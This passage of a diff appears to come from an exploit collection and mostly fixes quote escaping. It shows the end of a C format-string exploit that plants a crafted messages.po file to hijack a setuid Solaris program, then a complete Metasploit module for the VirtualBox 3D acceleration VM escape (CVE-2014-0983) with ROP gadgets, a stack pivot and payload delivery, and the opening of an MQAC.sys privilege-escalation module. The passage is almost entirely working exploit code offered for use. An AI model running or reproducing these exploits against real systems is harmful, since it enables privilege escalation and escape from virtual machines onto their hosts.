*/
|
||||
pad = 3 - (arg_len + strlen(env[0]) +1)%4;
|
||||
memset(padding, \'A\', pad);
|
||||
padding[pad] = \'\\0\';
|
||||
memset(padding, 'A', pad);
|
||||
padding[pad] = '\0';
|
||||
|
||||
/* get environ length */
|
||||
env_len = 0;
|
||||
|
@ -134,21 +134,21 @@ main( int argc, char **argv )
|
|||
* ^ ^
|
||||
* |__startaddr |__sp_addr
|
||||
*
|
||||
* \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
* "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
|
||||
*
|
||||
* I find \"startaddr\" always can be divided by 4.
|
||||
* So we can adjust the padding\'s size to let the fakeframe address
|
||||
* I find "startaddr" always can be divided by 4.
|
||||
* So we can adjust the padding's size to let the fakeframe address
|
||||
* can be aligned with 4.
|
||||
*
|
||||
* len = length of \"argv\" + \"env\" + \"platform\" + \"program name\"
|
||||
* len = length of "argv" + "env" + "platform" + "program name"
|
||||
* if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4
|
||||
* if (len%4)==0, sp_addr - startaddr = len
|
||||
* So we can get every entry\'s address precisely based on startaddr or sp_addr.
|
||||
* Now we won\'t be bored with guessing the alignment and offset.:)
|
||||
* So we can get every entry's address precisely based on startaddr or sp_addr.
|
||||
* Now we won't be bored with guessing the alignment and offset.:)
|
||||
*/
|
||||
len = arg_len + env_len + strlen(plat) + 1
|
||||
+ strlen(VULPROG) + 1;
|
||||
printf(\"len = %#x\\n\", len);
|
||||
printf("len = %#x\n", len);
|
||||
|
||||
/* get stack bottom address */
|
||||
|
||||
|
@ -161,7 +161,7 @@ main( int argc, char **argv )
|
|||
sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */
|
||||
- strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ;
|
||||
|
||||
printf(\"SHELL address = %#x\\n\", sh_addr);
|
||||
printf("SHELL address = %#x\n", sh_addr);
|
||||
|
||||
/* get our fake frame address */
|
||||
fp_addr = sh_addr - 8*8 - 1;
|
||||
|
@ -169,27 +169,27 @@ main( int argc, char **argv )
|
|||
/* get execl() address */
|
||||
if (!(handle=dlopen(NULL,RTLD_LAZY)))
|
||||
{
|
||||
fprintf(stderr,\"Can\'t dlopen myself.\\n\");
|
||||
fprintf(stderr,"Can't dlopen myself.\n");
|
||||
exit(1);
|
||||
}
|
||||
if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
|
||||
if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
|
||||
{
|
||||
fprintf(stderr,\"Can\'t find execl().\\n\");
|
||||
fprintf(stderr,"Can't find execl().\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* dec 4 to skip the \'save\' instructure */
|
||||
/* dec 4 to skip the 'save' instructure */
|
||||
execl_addr -= 4;
|
||||
|
||||
/* check if the exec addr includes zero */
|
||||
if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
|
||||
!(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
|
||||
{
|
||||
fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
|
||||
fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf(\"Using execl() address : %#x\\n\",execl_addr);
|
||||
printf("Using execl() address : %#x\n",execl_addr);
|
||||
|
||||
/* now we set up our fake stack frame */
|
||||
|
||||
|
@ -211,15 +211,15 @@ main( int argc, char **argv )
|
|||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr;
|
||||
*addrptr++=fp1_addr; /* we need this address to work */
|
||||
*addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
|
||||
*addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
|
||||
*addrptr++=0x0;
|
||||
|
||||
/* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
|
||||
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);
|
||||
|
||||
printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align );
|
||||
printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align );
|
||||
|
||||
/* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
/* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
|
||||
|
||||
addrptr = (long *)retlocbuf;
|
||||
|
||||
|
@ -231,19 +231,19 @@ main( int argc, char **argv )
|
|||
*(addrptr + 7) = retloc + 2;
|
||||
|
||||
if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
|
||||
printf(\"Can\'t get enough memory!\\n\");
|
||||
printf("Can't get enough memory!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
/* Let\'s make formats string buffer:
|
||||
/* Let's make formats string buffer:
|
||||
* |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|
|
||||
*/
|
||||
ptr = pattern;
|
||||
memset(ptr, \'A\', 32);
|
||||
memset(ptr, 'A', 32);
|
||||
ptr += 32;
|
||||
|
||||
for(i = 0 ; i < num ; i++ ){
|
||||
memcpy(ptr, \"%.8x\", 4);
|
||||
memcpy(ptr, "%.8x", 4);
|
||||
ptr += 4;
|
||||
}
|
||||
|
||||
|
@ -254,32 +254,32 @@ main( int argc, char **argv )
|
|||
|
||||
|
||||
/* Big endian arch */
|
||||
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
|
||||
sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
|
||||
(reth - num*8 -4*8 + align ), (0x10000 + retl - reth),
|
||||
(0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));
|
||||
|
||||
if( !(fp = fopen(\"messages.po\", \"w+\")))
|
||||
if( !(fp = fopen("messages.po", "w+")))
|
||||
{
|
||||
perror(\"fopen\");
|
||||
perror("fopen");
|
||||
exit(1);
|
||||
}
|
||||
fprintf(fp,\"domain \\\"messages\\\"\\n\");
|
||||
fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
|
||||
fprintf(fp,"domain \"messages\"\n");
|
||||
fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n");
|
||||
fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
|
||||
fclose(fp);
|
||||
system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
|
||||
system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");
|
||||
|
||||
/* thanks for z33d\'s idea.
|
||||
/* thanks for z33d's idea.
|
||||
* It seems we have to do like this in Solaris 8.
|
||||
*/
|
||||
i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
|
||||
i=open("./SUNW_OST_OSLIB",O_RDWR);
|
||||
/* locate the start position of formats strings in binary file*/
|
||||
lseek(i, 62, SEEK_SET);
|
||||
/* replace the start bytes with our retlocbuf */
|
||||
write(i, retlocbuf + align, 32 - align);
|
||||
close(i);
|
||||
|
||||
execle(VULPROG, VULPROG, \"-z\", NULL, env);
|
||||
execle(VULPROG, VULPROG, "-z", NULL, env);
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -3,13 +3,13 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require \'rex\'
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
||||
DEVICE = \'\\\\\\\\.\\\\VBoxGuest\'
|
||||
DEVICE = '\\\\.\\VBoxGuest'
|
||||
INVALID_HANDLE_VALUE = 0xFFFFFFFF
|
||||
|
||||
# VBOX HGCM protocol constants
|
||||
|
@ -36,59 +36,59 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
\'Name\' => \'VirtualBox 3D Acceleration Virtual Machine Escape\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
|
||||
vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
|
||||
sequence of specially crafted of rendering messages, a virtual machine can exploit an out
|
||||
of bounds array access to corrupt memory and escape to the host. This module has been
|
||||
tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'Francisco Falcon\', # Vulnerability Discovery and PoC
|
||||
\'Florian Ledoux\', # Win 8 64 bits exploitation analysis
|
||||
\'juan vazquez\' # MSF module
|
||||
'Francisco Falcon', # Vulnerability Discovery and PoC
|
||||
'Florian Ledoux', # Win 8 64 bits exploitation analysis
|
||||
'juan vazquez' # MSF module
|
||||
],
|
||||
\'Arch\' => ARCH_X86_64,
|
||||
\'Platform\' => \'win\',
|
||||
\'SessionTypes\' => [\'meterpreter\'],
|
||||
\'DefaultOptions\' =>
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
\'EXITFUNC\' => \'thread\'
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)\',
|
||||
[ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
|
||||
{
|
||||
:messages => :target_virtualbox_436_win7_64
|
||||
}
|
||||
]
|
||||
],
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 7000,
|
||||
\'DisableNops\' => true
|
||||
'Space' => 7000,
|
||||
'DisableNops' => true
|
||||
},
|
||||
\'References\' =>
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2014-0983\'],
|
||||
[\'BID\', \'66133\'],
|
||||
[\'URL\', \'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities\'],
|
||||
[\'URL\', \'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration\'],
|
||||
[\'URL\', \'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\']
|
||||
['CVE', '2014-0983'],
|
||||
['BID', '66133'],
|
||||
['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
|
||||
['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
|
||||
['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
|
||||
],
|
||||
\'DisclosureDate\' => \'Mar 11 2014\',
|
||||
\'DefaultTarget\' => 0
|
||||
'DisclosureDate' => 'Mar 11 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
|
||||
end
|
||||
|
||||
def open_device
|
||||
r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0)
|
||||
r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
|
||||
|
||||
handle = r[\'return\']
|
||||
handle = r['return']
|
||||
|
||||
if handle == INVALID_HANDLE_VALUE
|
||||
return nil
|
||||
|
@ -98,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def send_ioctl(ioctl, msg)
|
||||
result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\")
|
||||
result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
|
||||
|
||||
if result[\"GetLastError\"] != 0
|
||||
unless result[\"ErrorMessage\"].blank?
|
||||
vprint_error(\"#{result[\"ErrorMessage\"]}\")
|
||||
if result["GetLastError"] != 0
|
||||
unless result["ErrorMessage"].blank?
|
||||
vprint_error("#{result["ErrorMessage"]}")
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length
|
||||
unless result[\"ErrorMessage\"].blank?
|
||||
vprint_error(\"#{result[\"ErrorMessage\"]}\")
|
||||
unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
|
||||
unless result["ErrorMessage"].blank?
|
||||
vprint_error("#{result["ErrorMessage"]}")
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0
|
||||
unless result[\"ErrorMessage\"].blank?
|
||||
vprint_error(\"#{result[\"ErrorMessage\"]}\")
|
||||
unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
|
||||
unless result["ErrorMessage"].blank?
|
||||
vprint_error("#{result["ErrorMessage"]}")
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def connect
|
||||
msg = \"\\x00\" * CONNECT_MSG_SIZE
|
||||
msg = "\x00" * CONNECT_MSG_SIZE
|
||||
|
||||
msg[4, 4] = [2].pack(\"V\")
|
||||
msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\"
|
||||
msg[4, 4] = [2].pack("V")
|
||||
msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"
|
||||
|
||||
result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)
|
||||
|
||||
|
@ -136,15 +136,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return result
|
||||
end
|
||||
|
||||
client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first
|
||||
client_id = result["lpOutBuffer"][136, 4].unpack("V").first
|
||||
|
||||
client_id
|
||||
end
|
||||
|
||||
def disconnect
|
||||
msg = \"\\x00\" * DISCONNECT_MSG_SIZE
|
||||
msg = "\x00" * DISCONNECT_MSG_SIZE
|
||||
|
||||
msg[4, 4] = [@client_id].pack(\"V\")
|
||||
msg[4, 4] = [@client_id].pack("V")
|
||||
|
||||
result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)
|
||||
|
||||
|
@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def set_pid(pid)
|
||||
msg = \"\\x00\" * SET_PID_MSG_SIZE
|
||||
msg = "\x00" * SET_PID_MSG_SIZE
|
||||
|
||||
msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")
|
||||
msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\")
|
||||
msg[20, 4] = [pid].pack(\"V\")
|
||||
msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
|
||||
msg[4, 4] = [@client_id].pack("V") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
|
||||
msg[20, 4] = [pid].pack("V")
|
||||
|
||||
result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
|
||||
|
||||
|
@ -167,16 +167,16 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def set_version
|
||||
msg = \"\\x00\" * SET_VERSION_MSG_SIZE
|
||||
msg = "\x00" * SET_VERSION_MSG_SIZE
|
||||
|
||||
msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")
|
||||
msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
|
||||
msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\")
|
||||
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
|
||||
msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\")
|
||||
msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
|
||||
msg[4, 4] = [@client_id].pack("V") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
|
||||
msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
|
||||
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
|
||||
msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
|
||||
|
||||
result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
|
||||
|
||||
|
@ -184,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def trigger(buff_addr, buff_length)
|
||||
msg = \"\\x00\" * CALL_EA_MSG_SIZE
|
||||
msg = "\x00" * CALL_EA_MSG_SIZE
|
||||
|
||||
msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
|
||||
msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID
|
||||
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\")
|
||||
msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf)
|
||||
msg[36, 4] = [buff_addr].pack(\"V\") # (buf)
|
||||
msg[4, 4] = [@client_id].pack("V") # u32ClientID
|
||||
msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
|
||||
msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
|
||||
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
|
||||
msg[20, 4] = [@client_id].pack("V") # u32ClientID
|
||||
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
|
||||
msg[32, 4] = [buff_length].pack("V") # size_of(buf)
|
||||
msg[36, 4] = [buff_addr].pack("V") # (buf)
|
||||
|
||||
result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
|
||||
|
||||
|
@ -201,9 +201,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def stack_adjustment
|
||||
pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\" # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB
|
||||
pivot << \"\\x89\\xc4\" # mov esp, eax # Store stack bottom in esp
|
||||
pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # Plus a little offset...
|
||||
pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
|
||||
pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp
|
||||
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset...
|
||||
|
||||
pivot
|
||||
end
|
||||
|
@ -222,30 +222,30 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# See at the end of the module for a better description of the ROP Chain,
|
||||
# or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
|
||||
# All gadgets from VBoxREM.dll
|
||||
opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\")
|
||||
opcodes_data = [0x8, 0x30, 0x331].pack("V*")
|
||||
|
||||
opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
|
||||
opcodes_data << [112].pack(\"Q<\") # RDX
|
||||
opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret
|
||||
opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret
|
||||
opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
|
||||
opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret
|
||||
opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
|
||||
opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
|
||||
opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
|
||||
opcodes_data << [112].pack("Q<") # RDX
|
||||
opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
|
||||
opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
|
||||
opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
|
||||
opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
|
||||
opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
|
||||
opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
|
||||
opcodes_data << Rex::Text.pattern_create(80)
|
||||
opcodes_data << [0].pack(\"Q<\") # 1st arg (lpAddress) # chain will store stack address here
|
||||
opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here
|
||||
opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
|
||||
opcodes_data << [0x2000].pack(\"Q<\") # 2nd arg (dwSize)
|
||||
opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize)
|
||||
opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
|
||||
opcodes_data << [0x40].pack(\"V\") # 3rd arg (flNewProtect)
|
||||
opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect)
|
||||
opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
|
||||
opcodes_data << [0x6A70BB20].pack(\"V\") # ptr to jmp VirtualProtect instr.
|
||||
opcodes_data << \"A\" * 8
|
||||
opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9
|
||||
opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10
|
||||
opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\" # jmp $+608
|
||||
opcodes_data << \"A\" * (624 - 24 - 5)
|
||||
opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot
|
||||
opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr.
|
||||
opcodes_data << "A" * 8
|
||||
opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
|
||||
opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
|
||||
opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608
|
||||
opcodes_data << "A" * (624 - 24 - 5)
|
||||
opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
|
||||
opcodes_data << stack_adjustment
|
||||
opcodes_data << payload.encoded
|
||||
opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
|
||||
|
@ -256,11 +256,11 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# not reused until the second packet arrives. The second packet,
|
||||
# of course, must have 8196 bytes length too. So this memory is
|
||||
# reused and code execution can be accomplished.
|
||||
opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\")
|
||||
opcodes_data << \"B\" * (8196 - opcodes_data.length)
|
||||
opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
|
||||
opcodes_data << "B" * (8196 - opcodes_data.length)
|
||||
end
|
||||
|
||||
msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data
|
||||
msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
|
||||
|
||||
msg
|
||||
end
|
||||
|
@ -287,53 +287,53 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
def exploit
|
||||
unless self.respond_to?(target[:messages])
|
||||
print_error(\"Invalid target specified: no messages callback function defined\")
|
||||
print_error("Invalid target specified: no messages callback function defined")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"Opening device...\")
|
||||
print_status("Opening device...")
|
||||
@handle = open_device
|
||||
if @handle.nil?
|
||||
fail_with(Failure::NoTarget, \"#{DEVICE} device not found\")
|
||||
fail_with(Failure::NoTarget, "#{DEVICE} device not found")
|
||||
else
|
||||
print_good(\"#{DEVICE} found, exploiting...\")
|
||||
print_good("#{DEVICE} found, exploiting...")
|
||||
end
|
||||
|
||||
print_status(\"Connecting to the service...\")
|
||||
print_status("Connecting to the service...")
|
||||
@client_id = connect
|
||||
if @client_id.nil?
|
||||
fail_with(Failure::Unknown, \"Connect operation failed\")
|
||||
fail_with(Failure::Unknown, "Connect operation failed")
|
||||
end
|
||||
|
||||
print_good(\"Client ID #{@client_id}\")
|
||||
print_good("Client ID #{@client_id}")
|
||||
|
||||
print_status(\"Calling SET_VERSION...\")
|
||||
print_status("Calling SET_VERSION...")
|
||||
result = set_version
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to SET_VERSION\")
|
||||
fail_with(Failure::Unknown, "Failed to SET_VERSION")
|
||||
end
|
||||
|
||||
this_pid = session.sys.process.getpid
|
||||
print_status(\"Calling SET_PID...\")
|
||||
print_status("Calling SET_PID...")
|
||||
result = set_pid(this_pid)
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to SET_PID\")
|
||||
fail_with(Failure::Unknown, "Failed to SET_PID")
|
||||
end
|
||||
|
||||
this_proc = session.sys.process.open
|
||||
print_status(\"Sending First 0xEA Opcode Message to control head_spu...\")
|
||||
print_status("Sending First 0xEA Opcode Message to control head_spu...")
|
||||
result = send_opcodes_msg(this_proc, 1)
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to control heap_spu...\")
|
||||
fail_with(Failure::Unknown, "Failed to control heap_spu...")
|
||||
end
|
||||
|
||||
print_status(\"Sending Second 0xEA Opcode Message to execute payload...\")
|
||||
print_status("Sending Second 0xEA Opcode Message to execute payload...")
|
||||
@old_timeout = session.response_timeout
|
||||
session.response_timeout = 5
|
||||
begin
|
||||
send_opcodes_msg(this_proc, 2)
|
||||
rescue Rex::TimeoutError
|
||||
vprint_status(\"Expected timeout in case of successful exploitation\")
|
||||
vprint_status("Expected timeout in case of successful exploitation")
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -348,12 +348,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
unless @client_id.nil?
|
||||
print_status(\"Disconnecting from the service...\")
|
||||
print_status("Disconnecting from the service...")
|
||||
disconnect
|
||||
end
|
||||
|
||||
unless @handle.nil?
|
||||
print_status(\"Closing the device...\")
|
||||
print_status("Closing the device...")
|
||||
session.railgun.kernel32.CloseHandle(@handle)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,8 +3,8 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require \'rex\'
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
@ -14,64 +14,64 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
\'Name\' => \'MQAC.sys Arbitrary Write Privilege Escalation\',
|
||||
